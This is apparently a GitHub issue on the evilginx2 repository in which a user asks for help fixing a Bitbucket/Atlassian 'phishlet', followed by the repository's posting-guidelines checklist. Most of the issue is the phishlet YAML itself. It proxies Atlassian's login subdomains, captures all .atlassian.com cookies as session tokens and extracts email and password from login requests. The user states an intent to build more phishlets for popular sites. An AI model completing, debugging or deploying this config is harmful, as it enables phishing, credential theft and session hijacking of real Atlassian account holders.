### ISSUE TITLE
Bitbucket phishlet

### ISSUE THREAD

**Issue by thgitadm** [kgretzky/evilginx2#393]
Hi!
I want to create phishlet for bitbucket, but I can't. Always stuck at one place, and can't go further. Can you help me to find problem, or give some advise how to troubleshoot it? If I will be able to create this phishlet, I will create ones for other popular sites.

```
author: '@noname'
min_ver: '2.3.0'
proxy_hosts:
  - {phish_sub: 'id', orig_sub: 'id', domain: 'atlassian.com', session: true, is_landing: true}
  - {phish_sub: 'auth', orig_sub: 'auth', domain: 'atlassian.com', session: true, is_landing: false}
sub_filters: []
auth_tokens:
  - domain: '.atlassian.com'
    keys: ['.*,regexp']
credentials:
  username:
    key: 'username'
    search: '"email":"([^"]*)'
    type: 'json'
  password:
    key: 'password'
    search: '"password":"([^"]*)'
    type: 'json'
login:
  domain: 'id.atlassian.com'
  path: 'login?continue=https://start.atlassian.com/&email=noname@gmail.com&errorCode'
```

#### PLEASE READ THE POSTING GUIDELINES AND ANSWER THE QUESTION BEFORE POSTING, OTHERWISE ISSUE WILL BE CLOSED AND MARKED AS INVALID

* I hereby declare the following issue is a **[tool specific question/bug report]** and it is **NOT** a help request about creating a phishlet.
* I am fully aware that this is not a customer support portal, I can't demand answers and I'm aware I am using a free tool.
* I am not going to use Evilginx to hax my girlfriend's account or use it for any other illegal purpose.
* I am not trying to set up a domain on FreeNOM (also read the sentence above again).
* I am not a robot.
*(Sorry, if you are an adult and a professional and you had to read this.)*

Please type in "**I CONFIRM**" below if you confirm the sentences above or otherwise make some funny remark:

***I CONFIRM***

Thanks!
--
